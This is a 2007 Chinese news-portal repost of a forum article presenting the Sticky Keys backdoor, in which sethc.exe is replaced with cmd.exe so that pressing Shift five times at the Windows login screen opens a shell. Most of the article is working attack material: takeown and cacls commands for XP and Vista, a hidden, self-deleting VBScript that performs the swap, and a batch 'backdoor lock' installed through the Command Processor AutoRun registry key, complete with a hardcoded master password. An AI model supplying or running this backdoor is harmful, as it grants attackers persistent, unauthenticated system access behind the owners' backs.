变态入侵:有史以来最酷的Windows后门

2007年12月06日14:57  来源:来自论坛

 【字号 打印 留言 论坛 网摘 手机点评 纠错
E-mail推荐:  
  后门原理:

  在Windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

  XP:

  将安装源光盘弹出(或将硬盘上的安装目录改名)

  cd %widnir%\system32\dllcache

  ren sethc.exe *.ex~

  cd %widnir%\system32

  copy /y cmd.exe sethc.exe

  VISTA:

  takeown /f c:\windows\system32\sethc.exe

  cacls c:\windows\system32\sethc.exe /G administrator:F

  然后按XP方法替换文件

  在登录界面按5此SHIFT,出来cmd shell,然后……

  后门扩展:

  Dim obj, success

  Set obj = CreateObject("WScript.Shell")

  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)

  success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)

  success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)

  success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)

  success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)

  success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

  第二句最有意思了.自动应答....以前就遇到过类似的问题

  再更新.加个自删除,简化代码...

  On Error Resume Next

  Dim obj, success

  Set obj = CreateObject("WScript.Shell")

  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

  后门锁扩展:

  allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证

  用下面的后门锁的方法是 把代码保存为bdlock.bat

  然后修改注册表位置即可

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]

  "AutoRun"="bdlock.bat"

  @Echo Off

  title 后门登陆验证

  color a

  cls

  set temprandom=%RANDOM%

  echo 请输入验证码:%temprandom%

  set/p check=

  if "%check%"=="%temprandom%%temprandom%" goto passcheck

  if "%check%"=="%temprandom%" (

  rem 后门服务器验证

  rem 如果没有后门验证服务器请rem注释掉下一行代码

  if exist \192.168.8.8\backdoor$\pass goto passcheck

  )

  echo 验证失败

  pause

  exit

  :passcheck

  echo 验证成功

  If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx

  Set passcmdlock=http://blog.csdn.net/freexploit/

  :allyesno

  Set Errorlevel=>nul

  Echo 请输入验证密码?

  Set password=allyesno Is a pig>nul

  Set/p password=

  rem 万能密码

  if "%password%"=="allyesno is a sb" goto endx

  If %time:~1,1%==0 Set timechange=a

  If %time:~1,1%==1 Set timechange=b

  If %time:~1,1%==2 Set timechange=c

  If %time:~1,1%==3 Set timechange=d

  If %time:~1,1%==4 Set timechange=e

  If %time:~1,1%==5 Set timechange=f

  If %time:~1,1%==6 Set timechange=g

  If %time:~1,1%==7 Set timechange=h

  If %time:~1,1%==8 Set timechange=i

  If %time:~1,1%==9 Set timechange=j

  set/a sum=%time:~1,1%+%time:~1,1%

  Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul

  If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End

  Echo 请联系客服咨询正确密码!&Goto allyesno

  :End

  Set password=>nul

  Set Errorlevel=>nul

  Echo

  :endx

(责任编辑:宋阳)
我要发表留言
匿名发表  署名:        验证码:
                                   留言须知
新闻检索:    
   热图推荐
07最走红的十大美女明星
“亚洲股神”的五行论
不同区域 收入差出一大截
小狗求生视频感动百万网友
   精彩新闻
·[生活提示]当心6致癌新"杀手" 红薯是"最健康蔬菜"
·[质量播曝]"娃哈哈营养快线"发霉 无问题水袋伤人
·男子被撞昏迷入院抢救 各方推诿拒付救治费用
·2008年春运铁路票价不上浮 公路票价可适当浮动
·工行储户1700万存款丢失 员工配合违规转账
·未婚女体检时处女膜被裂伤 体检中心被判赔1万
·甘肃亿元得主闪电兑奖解密:福彩中心被逼说谎
·广州公交地铁降价方案即将听证
·北京规定公民有权对城管执法进行申诉
·50岁小学教师多次强奸女生致其怀孕
   播客·视频
宫廷御医后人揭秘四大误区
无手车王 驶上珠穆朗玛峰
   数码导购
·手机:欲跌破1500元的手机·手机:诺基亚价格全面崩盘
·相机:12款全球最佳相机·相机:最不值得购买的六款相机
·本本:陪女友买本实录·本本:大品牌双核独显本导购
·液显:网友公认低价19吋宽屏·液显:最令人瞠目LCD曝光
·MP3:苹果iPod最新报价  ·MP3:最具士兵精神的MP3
   一周精品回顾
 
 
·IT学院:免费使用 微软杀毒软件OneCare v2.0
·软件微软发布最新Windows Live ·暴风影音3发布试用体验
·安全卡巴斯基8.0.0.56 Beta下载·微软免费杀毒软件
·系统:5个不用苹果Leopard的理由·释放C盘空间的27招技巧
·QQ:教你打造非主流QQ空间·MSN:不会外语也能惬意聊天
[一语惊坛]一纸老虎:官情民情全拎清,纸虎画虎笑官场!
[访谈]李援邱小平谈"劳动合同法"·高法新闻发言人谈司法
[论坛]我们傻,所以争论虎照真假?·"婊子上街"是个啥模样
[辩论]轻生少女该不该舍命去救?·房价"雪崩"真的要来了!
[博客]多少人误读"黄猫黑猫"论?·"黑老大"当上人大代表?
[博客]张召忠:奥运期间真的不打仗?·解放军少将谈抗日!
   彩信·手机报
《人民日报》手机报

人民网彩信精彩大放送
人民网